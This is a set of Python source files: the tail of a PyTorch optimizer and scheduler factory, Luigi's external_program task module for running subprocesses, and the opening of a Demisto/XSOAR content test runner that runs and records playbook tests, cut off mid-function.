    # args.decay is a '-'-separated list of milestone epochs, e.g. '200-400'.
    milestones = list(map(lambda x: int(x), args.decay.split('-')))
    kwargs_scheduler = {'milestones': milestones, 'gamma': args.gamma}
    scheduler_class = lrs.MultiStepLR

    class CustomOptimizer(optimizer_class):
        # Optimizer subclass that carries its own LR scheduler plus
        # save/load helpers for checkpointing.
        def __init__(self, *args, **kwargs):
            super(CustomOptimizer, self).__init__(*args, **kwargs)

        def _register_scheduler(self, scheduler_class, **kwargs):
            self.scheduler = scheduler_class(self, **kwargs)

        def save(self, save_dir):
            # Persist only the optimizer state; the scheduler is rebuilt on load.
            torch.save(self.state_dict(), self.get_dir(save_dir))

        def load(self, load_dir, epoch=1):
            self.load_state_dict(torch.load(self.get_dir(load_dir)))
            # Fast-forward the scheduler to the resumed epoch.
            if epoch > 1:
                for _ in range(epoch): self.scheduler.step()

        def get_dir(self, dir_path):
            return os.path.join(dir_path, 'optimizer.pt')

        def schedule(self):
            self.scheduler.step()

        def get_lr(self):
            return self.scheduler.get_lr()[0]

        def get_last_epoch(self):
            return self.scheduler.last_epoch

    optimizer = CustomOptimizer(trainable, **kwargs_optimizer)
    optimizer._register_scheduler(scheduler_class, **kwargs_scheduler)
    return optimizer
|
external_program.py | # -*- coding: utf-8 -*-
#
# Copyright 2012-2016 Spotify AB
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
Template tasks for running external programs as luigi tasks.
This module is primarily intended for when you need to call a single external
program or shell script, and it's enough to specify program arguments and
environment variables.
If you need to run multiple commands, chain them together or pipe output
from one command to the next, you're probably better off using something like
`plumbum`_, and wrapping plumbum commands in normal luigi
:py:class:`~luigi.task.Task` s.
.. _plumbum: https://plumbum.readthedocs.io/
"""
import logging
import os
import re
import signal
import subprocess
import sys
import tempfile
from contextlib import contextmanager
from multiprocessing import Process
from time import sleep
import luigi
from luigi.parameter import ParameterVisibility
logger = logging.getLogger('luigi-interface')
class ExternalProgramTask(luigi.Task):
    """
    Template task for running an external program in a subprocess

    The program is run using :py:class:`subprocess.Popen`, with ``args`` passed
    as a list, generated by :py:meth:`program_args` (where the first element should
    be the executable). See :py:class:`subprocess.Popen` for details.

    You must override :py:meth:`program_args` to specify the arguments you want,
    and you can optionally override :py:meth:`program_environment` if you want to
    control the environment variables (see :py:class:`ExternalPythonProgramTask`
    for an example).

    By default, the output (stdout and stderr) of the run external program
    is being captured and displayed after the execution has ended. This
    behaviour can be overridden by passing ``--capture-output False``
    """
    capture_output = luigi.BoolParameter(default=True, significant=False, positional=False)
    stream_for_searching_tracking_url = luigi.parameter.ChoiceParameter(
        var_type=str, choices=['none', 'stdout', 'stderr'], default='none',
        significant=False, positional=False, visibility=ParameterVisibility.HIDDEN,
        description="Stream for searching tracking URL")
    """
    Used for defining which stream should be tracked for URL, may be set to 'stdout', 'stderr' or 'none'.
    Default value is 'none', so URL tracking is not performed.
    """
    tracking_url_pattern = luigi.OptionalParameter(
        default=None, significant=False, positional=False, visibility=ParameterVisibility.HIDDEN,
        description="Regex pattern used for searching URL in the logs of the external program")
    """
    Regex pattern used for searching URL in the logs of the external program.
    If a log line matches the regex, the first group in the matching is set as the tracking URL
    for the job in the web UI. Example: 'Job UI is here: (https?://.*)'.
    Default value is None, so URL tracking is not performed.
    """

    def program_args(self):
        """
        Override this method to map your task parameters to the program arguments

        :return: list to pass as ``args`` to :py:class:`subprocess.Popen`
        """
        raise NotImplementedError

    def program_environment(self):
        """
        Override this method to control environment variables for the program

        :return: dict mapping environment variable names to values
        """
        env = os.environ.copy()
        return env

    @property
    def always_log_stderr(self):
        """
        When True, stderr will be logged even if program execution succeeded

        Override to False to log stderr only when program execution fails.
        """
        return True

    def _clean_output_file(self, file_object):
        """Rewind a temporary output file and return its entire contents decoded as UTF-8 text."""
        file_object.seek(0)
        return ''.join(map(lambda s: s.decode('utf-8'), file_object.readlines()))

    def build_tracking_url(self, logs_output):
        """
        This method is intended for transforming pattern match in logs to an URL
        :param logs_output: Found match of `self.tracking_url_pattern`
        :return: a tracking URL for the task
        """
        return logs_output

    def run(self):
        """Run the external program, optionally capturing its output to temp files
        and scanning one stream for a tracking URL; raise on non-zero exit."""
        args = list(map(str, self.program_args()))
        logger.info('Running command: %s', ' '.join(args))
        env = self.program_environment()
        kwargs = {'env': env}
        tmp_stdout, tmp_stderr = None, None
        if self.capture_output:
            # Capture into temp files so the (possibly large) output can be
            # replayed into the logs after the program finishes.
            tmp_stdout, tmp_stderr = tempfile.TemporaryFile(), tempfile.TemporaryFile()
            kwargs.update({'stdout': tmp_stdout, 'stderr': tmp_stderr})
        try:
            if self.stream_for_searching_tracking_url != 'none' and self.tracking_url_pattern is not None:
                with self._proc_with_tracking_url_context(proc_args=args, proc_kwargs=kwargs) as proc:
                    proc.wait()
            else:
                proc = subprocess.Popen(args, **kwargs)
                with ExternalProgramRunContext(proc):
                    proc.wait()
            success = proc.returncode == 0
            if self.capture_output:
                stdout = self._clean_output_file(tmp_stdout)
                stderr = self._clean_output_file(tmp_stderr)
                if stdout:
                    logger.info('Program stdout:\n{}'.format(stdout))
                if stderr:
                    if self.always_log_stderr or not success:
                        logger.info('Program stderr:\n{}'.format(stderr))
            else:
                stdout, stderr = None, None
            if not success:
                raise ExternalProgramRunError(
                    'Program failed with return code={}:'.format(proc.returncode),
                    args, env=env, stdout=stdout, stderr=stderr)
        finally:
            if self.capture_output:
                tmp_stderr.close()
                tmp_stdout.close()

    @contextmanager
    def _proc_with_tracking_url_context(self, proc_args, proc_kwargs):
        """Start the program with the tracked stream piped, and scan that stream
        for `tracking_url_pattern` in a side process while the program runs."""
        time_to_sleep = 0.5
        file_to_write = proc_kwargs.get(self.stream_for_searching_tracking_url)
        proc_kwargs.update({self.stream_for_searching_tracking_url: subprocess.PIPE})
        main_proc = subprocess.Popen(proc_args, **proc_kwargs)
        pipe_to_read = main_proc.stderr if self.stream_for_searching_tracking_url == 'stderr' else main_proc.stdout

        def _track_url_by_pattern():
            """
            Scans the pipe looking for a passed pattern, if the pattern is found, `set_tracking_url` callback is sent.
            If tmp_stdout is passed, also appends lines to this file.
            """
            pattern = re.compile(self.tracking_url_pattern)
            # FIX: the pipe is opened in binary mode so readline() yields bytes.
            # The previous str sentinel '' never matched EOF's b'', leaving the
            # loop spinning forever and relying on terminate() to stop it.
            for new_line in iter(pipe_to_read.readline, b''):
                if new_line:
                    if file_to_write:
                        file_to_write.write(new_line)
                    match = re.search(pattern, new_line.decode('utf-8'))
                    if match:
                        self.set_tracking_url(
                            self.build_tracking_url(match.group(1))
                        )
                else:
                    # FIX: file_to_write is None when capture_output is off;
                    # guard before flushing to avoid AttributeError.
                    if file_to_write:
                        file_to_write.flush()
                    sleep(time_to_sleep)

        track_proc = Process(target=_track_url_by_pattern)
        try:
            track_proc.start()
            with ExternalProgramRunContext(main_proc):
                yield main_proc
        finally:
            # need to wait a bit to let the subprocess read the last lines
            track_proc.join(time_to_sleep * 2)
            if track_proc.is_alive():
                track_proc.terminate()
            pipe_to_read.close()
class ExternalProgramRunContext:
    """Context manager that guarantees a child process is killed when the
    wrapping task is interrupted (SIGTERM or KeyboardInterrupt)."""

    def __init__(self, proc):
        self.proc = proc

    def __enter__(self):
        # Remember the previous SIGTERM handler so it can be restored on exit.
        self._previous_handler = signal.getsignal(signal.SIGTERM)
        signal.signal(signal.SIGTERM, self.kill_job)
        return self

    def __exit__(self, exc_type, exc_val, exc_tb):
        # Ctrl-C does not raise SIGTERM, so kill the child explicitly.
        if exc_type is KeyboardInterrupt:
            self.kill_job()
        signal.signal(signal.SIGTERM, self._previous_handler)

    def kill_job(self, captured_signal=None, stack_frame=None):
        """Kill the wrapped process; when invoked as a signal handler, exit
        with the exit code conventionally associated with that signal."""
        self.proc.kill()
        if captured_signal is None:
            return
        # adding 128 gives the exit code corresponding to a signal
        sys.exit(128 + captured_signal)
class ExternalProgramRunError(RuntimeError):
    """Raised when an external program exits with a non-zero return code.

    Carries the command, environment and captured output so the failure can
    be reported in full detail.
    """

    def __init__(self, message, args, env=None, stdout=None, stderr=None):
        super(ExternalProgramRunError, self).__init__(message, args, env, stdout, stderr)
        self.message = message
        self.args = args
        self.env = env
        self.out = stdout
        self.err = stderr

    def __str__(self):
        env_string = None
        if self.env:
            env_string = ' '.join(
                "{}='{}'".format(key, value) for key, value in self.env.items())
        lines = [
            self.message,
            'COMMAND: {}'.format(' '.join(self.args)),
            'STDOUT: {}'.format(self.out or '[empty]'),
            'STDERR: {}'.format(self.err or '[empty]'),
            'ENVIRONMENT: {}'.format(env_string or '[empty]'),
        ]
        # reset terminal color in case the ENVIRONMENT changes colors
        return '\n'.join(lines) + '\033[m'
class ExternalPythonProgramTask(ExternalProgramTask):
    """
    Template task for running an external Python program in a subprocess

    Simple extension of :py:class:`ExternalProgramTask`, adding two
    :py:class:`luigi.parameter.Parameter` s for setting a virtualenv and for
    extending the ``PYTHONPATH``.
    """
    virtualenv = luigi.OptionalParameter(
        default=None,
        positional=False,
        description='path to the virtualenv directory to use. It should point to '
                    'the directory containing the ``bin/activate`` file used for '
                    'enabling the virtualenv.')
    extra_pythonpath = luigi.OptionalParameter(
        default=None,
        positional=False,
        description='extend the search path for modules by prepending this '
                    'value to the ``PYTHONPATH`` environment variable.')

    def program_environment(self):
        """Return the inherited environment adjusted for the configured
        virtualenv and ``PYTHONPATH`` extension."""
        env = super(ExternalPythonProgramTask, self).program_environment()
        if self.extra_pythonpath:
            # Prepend so the configured path takes precedence over any existing entries.
            env['PYTHONPATH'] = ':'.join([self.extra_pythonpath, env.get('PYTHONPATH', '')])
        if self.virtualenv:
            # Make the same changes to the env that a normal venv/bin/activate script would
            env['PATH'] = ':'.join(['{}/bin'.format(self.virtualenv), env.get('PATH', '')])
            env['VIRTUAL_ENV'] = self.virtualenv
            # remove PYTHONHOME env variable, if it exists
            env.pop('PYTHONHOME', None)
        return env
|
test_content.py | from __future__ import print_function
import os
import re
import sys
import json
import time
import argparse
import threading
import subprocess
import traceback
from time import sleep
import datetime
from distutils.version import LooseVersion
import pytz
from google.cloud import storage
from google.api_core.exceptions import PreconditionFailed
from queue import Queue
from contextlib import contextmanager
import urllib3
import requests
import demisto_client.demisto_api
from demisto_client.demisto_api.rest import ApiException
from slackclient import SlackClient
from Tests.mock_server import MITMProxy, AMIConnection
from Tests.test_integration import Docker, test_integration, disable_all_integrations
from Tests.test_dependencies import get_used_integrations, get_tests_allocation_for_threads
from demisto_sdk.commands.common.constants import RUN_ALL_TESTS_FORMAT, FILTER_CONF, PB_Status
from demisto_sdk.commands.common.tools import print_color, print_error, print_warning, \
LOG_COLORS, str2bool
# Disable insecure warnings
urllib3.disable_warnings()
# Template for the server base URL - formatted with the instance host/IP.
SERVER_URL = "https://{}"
INTEGRATIONS_CONF = "./Tests/integrations_file.txt"
# Error printed when several configured instances match one integration and no
# instance_name was selected - formatted with (playbook, count, name, options).
FAILED_MATCH_INSTANCE_MSG = "{} Failed to run.\n There are {} instances of {}, please select one of them by using " \
                            "the instance_name argument in conf.json. The options are:\n{}"
# Timeout (seconds) and polling step used when waiting for a service restart.
SERVICE_RESTART_TIMEOUT = 300
SERVICE_RESTART_POLLING_INTERVAL = 5
# NOTE(review): presumably the GCS prefix used for test-lock blobs - confirm against lock helpers.
LOCKS_PATH = 'content-locks'
# CI environment values; any of these may be None on a local run.
BUCKET_NAME = os.environ.get('GCS_ARTIFACTS_BUCKET')
CIRCLE_BUILD_NUM = os.environ.get('CIRCLE_BUILD_NUM')
WORKFLOW_ID = os.environ.get('CIRCLE_WORKFLOW_ID')
CIRCLE_STATUS_TOKEN = os.environ.get('CIRCLECI_STATUS_TOKEN')
# Slack channel id used for memory-check reporting (see --memCheck option help).
SLACK_MEM_CHANNEL_ID = 'CM55V7J8K'
PROXY_LOG_FILE_NAME = 'proxy_metrics.csv'
ENV_RESULTS_PATH = './env_results.json'
def options_handler():
    """Parse the command line arguments and wrap them in a TestsSettings object."""
    parser = argparse.ArgumentParser(description='Utility for batch action on incidents')
    parser.add_argument('-k', '--apiKey', help='The Demisto API key for the server', required=True)
    parser.add_argument('-s', '--server', help='The server URL to connect to')
    parser.add_argument('-c', '--conf', help='Path to conf file', required=True)
    parser.add_argument('-e', '--secret', help='Path to secret conf file')
    parser.add_argument('-n', '--nightly', type=str2bool, help='Run nightly tests')
    parser.add_argument('-t', '--slack', help='The token for slack', required=True)
    parser.add_argument('-a', '--circleci', help='The token for circleci', required=True)
    parser.add_argument('-b', '--buildNumber', help='The build number', required=True)
    parser.add_argument('-g', '--buildName', help='The build name', required=True)
    parser.add_argument('-i', '--isAMI', type=str2bool, help='is AMI build or not', default=False)
    parser.add_argument('-m', '--memCheck', type=str2bool,
                        help='Should trigger memory checks or not. The slack channel to check the data is: '
                             'dmst_content_nightly_memory_data', default=False)
    parser.add_argument('-d', '--serverVersion', help='Which server version to run the '
                                                      'tests on(Valid only when using AMI)', default="NonAMI")
    parser.add_argument('-l', '--testsList', help='List of specific, comma separated'
                                                  'tests to run')
    options = parser.parse_args()
    tests_settings = TestsSettings(options)
    return tests_settings
class TestsSettings:
    """Plain value object holding the parsed command-line options of a test run."""

    def __init__(self, options):
        self.api_key = options.apiKey
        self.server = options.server
        self.conf_path = options.conf
        self.secret_conf_path = options.secret
        self.nightly = options.nightly
        self.slack = options.slack
        self.circleci = options.circleci
        self.buildNumber = options.buildNumber
        self.buildName = options.buildName
        self.isAMI = options.isAMI
        self.memCheck = options.memCheck
        self.serverVersion = options.serverVersion
        # Filled in later, after the server's numeric version is detected.
        self.serverNumericVersion = None
        self.specific_tests_to_run = self.parse_tests_list_arg(options.testsList)
        # An explicitly supplied server URL means this is a local (non-CI) run.
        self.is_local_run = (self.server is not None)

    @staticmethod
    def parse_tests_list_arg(tests_list):
        """Split a comma-separated tests string into a list (empty when unset)."""
        return tests_list.split(",") if tests_list else []
class PrintJob:
    """A deferred print call: a message, the print function to run it with,
    and an optional color argument."""

    def __init__(self, message_to_print, print_function_to_execute, message_color=None):
        self.print_function_to_execute = print_function_to_execute
        self.message_to_print = message_to_print
        self.message_color = message_color

    def execute_print(self):
        """Invoke the stored print function, passing the color only when one was set."""
        if not self.message_color:
            self.print_function_to_execute(self.message_to_print)
        else:
            self.print_function_to_execute(self.message_to_print, self.message_color)
class ParallelPrintsManager:
    """Per-thread print-job queues flushed under a shared lock, so output from
    parallel test threads does not interleave on stdout."""

    def __init__(self, number_of_threads):
        # One pending-jobs list per worker thread, indexed by thread_index.
        self.threads_print_jobs = [[] for i in range(number_of_threads)]
        # Serializes the actual printing across threads.
        self.print_lock = threading.Lock()
        # Last time each thread queued a message - drives the keep-alive print below.
        self.threads_last_update_times = [time.time() for i in range(number_of_threads)]

    def should_update_thread_status(self, thread_index):
        """Return True when the thread has not queued a message for over 5 minutes."""
        current_time = time.time()
        thread_last_update = self.threads_last_update_times[thread_index]
        return current_time - thread_last_update > 300

    def add_print_job(self, message_to_print, print_function_to_execute, thread_index, message_color=None,
                      include_timestamp=False):
        """Queue a message for `thread_index`, optionally prefixed with a UTC timestamp.

        Also emits an immediate keep-alive line when the thread has been quiet
        for a long time, so CI does not assume the build is stuck.
        """
        if include_timestamp:
            message_to_print = f'[{datetime.datetime.now(datetime.timezone.utc)}] {message_to_print}'
        print_job = PrintJob(message_to_print, print_function_to_execute, message_color=message_color)
        self.threads_print_jobs[thread_index].append(print_job)
        if self.should_update_thread_status(thread_index):
            print("Thread {} is still running.".format(thread_index))
            self.threads_last_update_times[thread_index] = time.time()

    def execute_thread_prints(self, thread_index):
        """Print and clear all queued jobs of `thread_index` atomically.

        FIX: the previous acquire()/release() pair had no try/finally, so a
        print job raising an exception would leave the lock held forever and
        deadlock every other thread; it also cleared the job list only after
        releasing the lock. Using `with` guarantees release, and the queue is
        cleared inside the critical section.
        """
        with self.print_lock:
            for print_job in self.threads_print_jobs[thread_index]:
                print_job.execute_print()
            self.threads_print_jobs[thread_index] = []
class TestsDataKeeper:
    """Accumulator for the results of all test threads."""

    def __init__(self):
        self.succeeded_playbooks = []
        self.failed_playbooks = []
        self.skipped_tests = []
        self.skipped_integrations = []
        self.rerecorded_tests = []
        self.empty_files = []
        self.unmockable_integrations = {}

    def add_tests_data(self, succeed_playbooks, failed_playbooks, skipped_tests, skipped_integration,
                       unmockable_integrations):
        """Merge one thread's results into the shared result lists."""
        # Using multiple appends and not extend since append is guaranteed to be thread safe
        for entry in succeed_playbooks:
            self.succeeded_playbooks.append(entry)
        for entry in failed_playbooks:
            self.failed_playbooks.append(entry)
        for entry in skipped_tests:
            self.skipped_tests.append(entry)
        for entry in skipped_integration:
            self.skipped_integrations.append(entry)
        for integration_id, reason in unmockable_integrations.items():
            self.unmockable_integrations[integration_id] = reason

    def add_proxy_related_test_data(self, proxy):
        """Copy re-record and empty-mock bookkeeping from a proxy instance."""
        # Using multiple appends and not extend since append is guaranteed to be thread safe
        for test_id in proxy.rerecorded_tests:
            self.rerecorded_tests.append(test_id)
        for test_id in proxy.empty_files:
            self.empty_files.append(test_id)
def print_test_summary(tests_data_keeper, is_ami=True):
    """Print the aggregated results of the whole test run to stdout.

    :param tests_data_keeper: TestsDataKeeper holding all collected results
    :param is_ami: when False, mock re-record / empty-mock statistics are suppressed
    """
    succeed_playbooks = tests_data_keeper.succeeded_playbooks
    failed_playbooks = tests_data_keeper.failed_playbooks
    skipped_tests = tests_data_keeper.skipped_tests
    unmocklable_integrations = tests_data_keeper.unmockable_integrations
    skipped_integration = tests_data_keeper.skipped_integrations
    rerecorded_tests = tests_data_keeper.rerecorded_tests
    empty_files = tests_data_keeper.empty_files
    succeed_count = len(succeed_playbooks)
    failed_count = len(failed_playbooks)
    skipped_count = len(skipped_tests)
    # Mock statistics are only meaningful on AMI builds where the proxy records traffic.
    rerecorded_count = len(rerecorded_tests) if is_ami else 0
    empty_mocks_count = len(empty_files) if is_ami else 0
    unmocklable_integrations_count = len(unmocklable_integrations)
    print('\nTEST RESULTS:')
    tested_playbooks_message = '\t Number of playbooks tested - ' + str(succeed_count + failed_count)
    print(tested_playbooks_message)
    succeeded_playbooks_message = '\t Number of succeeded tests - ' + str(succeed_count)
    print_color(succeeded_playbooks_message, LOG_COLORS.GREEN)
    # Each optional section is printed only when it has entries.
    if failed_count > 0:
        failed_tests_message = '\t Number of failed tests - ' + str(failed_count) + ':'
        print_error(failed_tests_message)
        for playbook_id in failed_playbooks:
            print_error('\t - ' + playbook_id)
    if rerecorded_count > 0:
        recording_warning = '\t Tests with failed playback and successful re-recording - ' + str(rerecorded_count) + ':'
        print_warning(recording_warning)
        for playbook_id in rerecorded_tests:
            print_warning('\t - ' + playbook_id)
    if empty_mocks_count > 0:
        empty_mock_successes_msg = '\t Successful tests with empty mock files - ' + str(empty_mocks_count) + ':'
        print(empty_mock_successes_msg)
        proxy_explanation = '\t (either there were no http requests or no traffic is passed through the proxy.\n' \
                            '\t Investigate the playbook and the integrations.\n' \
                            '\t If the integration has no http traffic, add to unmockable_integrations in conf.json)'
        print(proxy_explanation)
        for playbook_id in empty_files:
            print('\t - ' + playbook_id)
    if len(skipped_integration) > 0:
        skipped_integrations_warning = '\t Number of skipped integration - ' + str(len(skipped_integration)) + ':'
        print_warning(skipped_integrations_warning)
        for playbook_id in skipped_integration:
            print_warning('\t - ' + playbook_id)
    if skipped_count > 0:
        skipped_tests_warning = '\t Number of skipped tests - ' + str(skipped_count) + ':'
        print_warning(skipped_tests_warning)
        for playbook_id in skipped_tests:
            print_warning('\t - ' + playbook_id)
    if unmocklable_integrations_count > 0:
        unmockable_warning = '\t Number of unmockable integrations - ' + str(unmocklable_integrations_count) + ':'
        print_warning(unmockable_warning)
        for playbook_id, reason in unmocklable_integrations.items():
            print_warning('\t - ' + playbook_id + ' - ' + reason)
def update_test_msg(integrations, test_message):
    """Append the configured integration names to a test description, if any."""
    if not integrations:
        return test_message
    names = ','.join(integration['name'] for integration in integrations)
    return test_message + ' with integration(s): ' + names
def turn_off_telemetry(xsoar_client):
    """
    Turn off telemetry on the AMI instance

    :param xsoar_client: Preconfigured client for the XSOAR instance
    :return: None
    """
    body, status_code, _ = demisto_client.generic_request_func(self=xsoar_client, method='POST',
                                                               path='/telemetry?status=notelemetry')
    if status_code != 200:
        # A failed telemetry toggle is treated as fatal for the whole build.
        print_error('Request to turn off telemetry failed with status code "{}"\n{}'.format(status_code, body))
        sys.exit(1)
def reset_containers(server, demisto_user, demisto_pass, prints_manager, thread_index):
    """Ask the server to reset its containers and wait briefly for them to settle.

    Exits the process when the reset API call fails.
    """
    prints_manager.add_print_job('Resetting containers', print, thread_index)
    client = demisto_client.configure(base_url=server, username=demisto_user, password=demisto_pass, verify_ssl=False)
    body, status_code, _ = demisto_client.generic_request_func(self=client, method='POST',
                                                               path='/containers/reset')
    if status_code != 200:
        error_msg = 'Request to reset containers failed with status code "{}"\n{}'.format(status_code, body)
        prints_manager.add_print_job(error_msg, print_error, thread_index)
        # Flush pending prints before exiting so the error is actually visible.
        prints_manager.execute_thread_prints(thread_index)
        sys.exit(1)
    # Give the containers a moment to come back up before tests continue.
    sleep(10)
def has_unmockable_integration(integrations, unmockable_integrations):
    """Return the names of `integrations` that are marked unmockable (possibly empty)."""
    configured_names = {integration['name'] for integration in integrations}
    return list(configured_names & set(unmockable_integrations.keys()))
def get_docker_limit():
    """Read the container memory limit from the cgroup v1 file.

    Returns the (stdout, stderr) pair of the `cat` subprocess; stderr is merged
    into stdout, so the second element is always None.
    """
    command = ['cat', '/sys/fs/cgroup/memory/memory.limit_in_bytes']
    process = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
    return process.communicate()
def get_docker_processes_data():
    """Capture the output of `ps aux` inside the container.

    Returns the (stdout, stderr) pair; stderr is merged into stdout, so the
    second element is always None.
    """
    process = subprocess.Popen(['ps', 'aux'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
    return process.communicate()
def get_docker_memory_data():
    """Read the container's current memory usage from the cgroup v1 file.

    Returns the (stdout, stderr) pair of the `cat` subprocess; stderr is merged
    into stdout, so the second element is always None.
    """
    command = ['cat', '/sys/fs/cgroup/memory/memory.usage_in_bytes']
    process = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
    return process.communicate()
def send_slack_message(slack, chanel, text, user_name, as_user):
    """Post `text` to a Slack channel via the chat.postMessage API.

    :param slack: Slack API token used to build the client
    :param chanel: target channel id (parameter name kept for compatibility)
    """
    client = SlackClient(slack)
    client.api_call(
        "chat.postMessage",
        channel=chanel,
        username=user_name,
        as_user=as_user,
        text=text,
        mrkdwn='true',
    )
def run_test_logic(conf_json_test_details, tests_queue, tests_settings, c, failed_playbooks, integrations, playbook_id,
                   succeed_playbooks, test_message, test_options, slack, circle_ci, build_number, server_url,
                   build_name, prints_manager, thread_index=0, is_mock_run=False):
    """Run one test playbook under the integrations' test lock and record the outcome.

    Mutates `succeed_playbooks` / `failed_playbooks` in place. When the lock
    cannot be acquired, the test is put back on `tests_queue` for a later retry.

    :return: True when the playbook completed (or was skipped for version), False otherwise.
    """
    with acquire_test_lock(integrations,
                           test_options.get('timeout'),
                           prints_manager,
                           thread_index,
                           tests_settings.conf_path) as lock:
        if lock:
            status, inc_id = test_integration(c, server_url, integrations, playbook_id, prints_manager, test_options,
                                              is_mock_run, thread_index=thread_index)
            # c.api_client.pool.close()
            if status == PB_Status.COMPLETED:
                prints_manager.add_print_job('PASS: {} succeed'.format(test_message), print_color, thread_index,
                                             message_color=LOG_COLORS.GREEN)
                succeed_playbooks.append(playbook_id)
            elif status == PB_Status.NOT_SUPPORTED_VERSION:
                # Counted as a success: the test simply does not apply to this server version.
                not_supported_version_message = 'PASS: {} skipped - not supported version'.format(test_message)
                prints_manager.add_print_job(not_supported_version_message, print, thread_index)
                succeed_playbooks.append(playbook_id)
            else:
                error_message = 'Failed: {} failed'.format(test_message)
                prints_manager.add_print_job(error_message, print_error, thread_index)
                playbook_id_with_mock = playbook_id
                if not is_mock_run:
                    playbook_id_with_mock += " (Mock Disabled)"
                failed_playbooks.append(playbook_id_with_mock)
                # On CI runs, ping the build author on Slack about the failure.
                if not tests_settings.is_local_run:
                    notify_failed_test(slack, circle_ci, playbook_id, build_number, inc_id, server_url, build_name)
            succeed = status in (PB_Status.COMPLETED, PB_Status.NOT_SUPPORTED_VERSION)
        else:
            # Lock not acquired - re-queue the test so another attempt happens later.
            tests_queue.put(conf_json_test_details)
            succeed = False
    return succeed
# run the test using a real instance, record traffic.
def run_and_record(conf_json_test_details, tests_queue, tests_settings, c, proxy, failed_playbooks, integrations,
                   playbook_id, succeed_playbooks, test_message, test_options, slack, circle_ci, build_number,
                   server_url, build_name, prints_manager, thread_index=0):
    """Execute the test against a live instance while the proxy records traffic.

    On success the freshly recorded mock is cleaned and moved into the mock
    repository; on failure the re-record is counted as failed.

    :return: True when the underlying test run succeeded.
    """
    proxy.set_tmp_folder()
    proxy.start(playbook_id, record=True, thread_index=thread_index, prints_manager=prints_manager)
    succeed = run_test_logic(conf_json_test_details, tests_queue, tests_settings, c, failed_playbooks, integrations,
                             playbook_id, succeed_playbooks, test_message, test_options, slack, circle_ci, build_number,
                             server_url, build_name, prints_manager, thread_index=thread_index, is_mock_run=True)
    proxy.stop(thread_index=thread_index, prints_manager=prints_manager)
    if succeed:
        proxy.successful_rerecord_count += 1
        proxy.clean_mock_file(playbook_id, thread_index=thread_index, prints_manager=prints_manager)
        proxy.move_mock_file_to_repo(playbook_id, thread_index=thread_index, prints_manager=prints_manager)
    else:
        proxy.failed_rerecord_count += 1
        proxy.failed_rerecord_tests.append(playbook_id)
    # Point the proxy back at the committed mock repository for subsequent tests.
    proxy.set_repo_folder()
    return succeed
def mock_run(conf_json_test_details, tests_queue, tests_settings, c, proxy, failed_playbooks, integrations,
             playbook_id, succeed_playbooks, test_message, test_options, slack, circle_ci, build_number, server_url,
             build_name, start_message, prints_manager, thread_index=0):
    """Run a test using recorded mocks when possible, falling back to (re)recording.

    Playback is attempted first when a mock file exists; on a playback failure
    (other than a docker-check failure) the test is re-run live and re-recorded.
    """
    rerecord = False
    if proxy.has_mock_file(playbook_id):
        start_mock_message = '{} (Mock: Playback)'.format(start_message)
        prints_manager.add_print_job(start_mock_message, print, thread_index, include_timestamp=True)
        proxy.start(playbook_id, thread_index=thread_index, prints_manager=prints_manager)
        # run test
        status, _ = test_integration(c, server_url, integrations, playbook_id, prints_manager, test_options,
                                     is_mock_run=True, thread_index=thread_index)
        # use results
        proxy.stop(thread_index=thread_index, prints_manager=prints_manager)
        if status == PB_Status.COMPLETED:
            proxy.successful_tests_count += 1
            succeed_message = 'PASS: {} succeed'.format(test_message)
            prints_manager.add_print_job(succeed_message, print_color, thread_index, LOG_COLORS.GREEN)
            succeed_playbooks.append(playbook_id)
            end_mock_message = f'------ Test {test_message} end ------\n'
            prints_manager.add_print_job(end_mock_message, print, thread_index, include_timestamp=True)
            return
        if status == PB_Status.NOT_SUPPORTED_VERSION:
            # Counted as a pass: the test does not apply to this server version.
            not_supported_version_message = 'PASS: {} skipped - not supported version'.format(test_message)
            prints_manager.add_print_job(not_supported_version_message, print, thread_index)
            succeed_playbooks.append(playbook_id)
            end_mock_message = f'------ Test {test_message} end ------\n'
            prints_manager.add_print_job(end_mock_message, print, thread_index, include_timestamp=True)
            return
        if status == PB_Status.FAILED_DOCKER_TEST:
            # Docker-check failures are real failures - re-recording would not help.
            error_message = 'Failed: {} failed'.format(test_message)
            prints_manager.add_print_job(error_message, print_error, thread_index)
            failed_playbooks.append(playbook_id)
            end_mock_message = f'------ Test {test_message} end ------\n'
            prints_manager.add_print_job(end_mock_message, print, thread_index, include_timestamp=True)
            return
        # Any other playback failure: fall through to record a fresh mock.
        proxy.failed_tests_count += 1
        mock_failed_message = "Test failed with mock, recording new mock file. (Mock: Recording)"
        prints_manager.add_print_job(mock_failed_message, print, thread_index)
        rerecord = True
    else:
        mock_recording_message = start_message + ' (Mock: Recording)'
        prints_manager.add_print_job(mock_recording_message, print, thread_index, include_timestamp=True)
    # Mock recording - no mock file or playback failure.
    # NOTE(review): the client is rebuilt here before the live run - presumably to
    # get a fresh connection after the playback attempt; confirm against demisto_client.
    c = demisto_client.configure(base_url=c.api_client.configuration.host,
                                 api_key=c.api_client.configuration.api_key, verify_ssl=False)
    succeed = run_and_record(conf_json_test_details, tests_queue, tests_settings, c, proxy, failed_playbooks,
                             integrations, playbook_id, succeed_playbooks, test_message, test_options, slack, circle_ci,
                             build_number, server_url, build_name, prints_manager, thread_index=thread_index)
    if rerecord and succeed:
        proxy.rerecorded_tests.append(playbook_id)
    test_end_message = f'------ Test {test_message} end ------\n'
    prints_manager.add_print_job(test_end_message, print, thread_index, include_timestamp=True)
def run_test(conf_json_test_details, tests_queue, tests_settings, demisto_user, demisto_pass, proxy, failed_playbooks,
             integrations, unmockable_integrations, playbook_id, succeed_playbooks, test_message, test_options,
             slack, circle_ci, build_number, server_url, build_name, prints_manager, is_ami=True, thread_index=0):
    """Entry point for one test: choose between a mocked run and a direct run.

    Mocks are skipped for non-AMI builds, for tests with no integrations, and
    for tests that use an integration marked as unmockable.
    """
    start_message = f'------ Test {test_message} start ------'
    client = demisto_client.configure(base_url=server_url, username=demisto_user, password=demisto_pass, verify_ssl=False)
    if not is_ami or (not integrations or has_unmockable_integration(integrations, unmockable_integrations)):
